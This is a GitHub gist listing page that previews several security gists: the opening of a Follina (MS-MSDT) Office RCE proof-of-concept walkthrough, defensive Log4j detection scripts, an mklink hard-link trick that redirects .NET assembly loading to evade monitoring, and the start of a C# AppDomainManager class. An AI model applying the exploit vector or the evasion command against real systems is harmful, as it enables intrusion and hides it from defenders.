
Kevin Temming Skons

@Skons
Skons / ms-msdt.MD
Created May 30, 2022 18:12 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML URL scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@Skons
Skons / Test-Log4jVulnerability.ps1
Last active December 14, 2021 08:33
Test Log4j CVE-2021-44228 vulnerability
Function Test-Log4jVulnerability {
<#
.SYNOPSIS
Test jar files in a csv file created with Find-File
.DESCRIPTION
Test if log4j files are vulnerable for CVE-2021-44228
.PARAMETER WorkingDirectory
A location where temporary files will be stored
.PARAMETER Path
The CSV file created with Find-File
@Skons
Skons / log4jfinder.ps1
Last active December 13, 2021 14:12
log4jfinder
#region support functions
Function ConvertFrom-RobocopyLog {
<#
.SYNOPSIS
Convert a Robocopy log file to a CSV
.DESCRIPTION
Convert a Robocopy log file to a CSV
.PARAMETER Delimiter
Delimiter used within the log file
.PARAMETER SourceFile
@Skons
Skons / Update_Notes.md
Created July 31, 2019 19:05
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the assembly search to an arbitrary location and evade tools that are looking for file modifications in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@Skons
Skons / Tasks.cs
Created July 29, 2019 19:12
.NET Fun
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{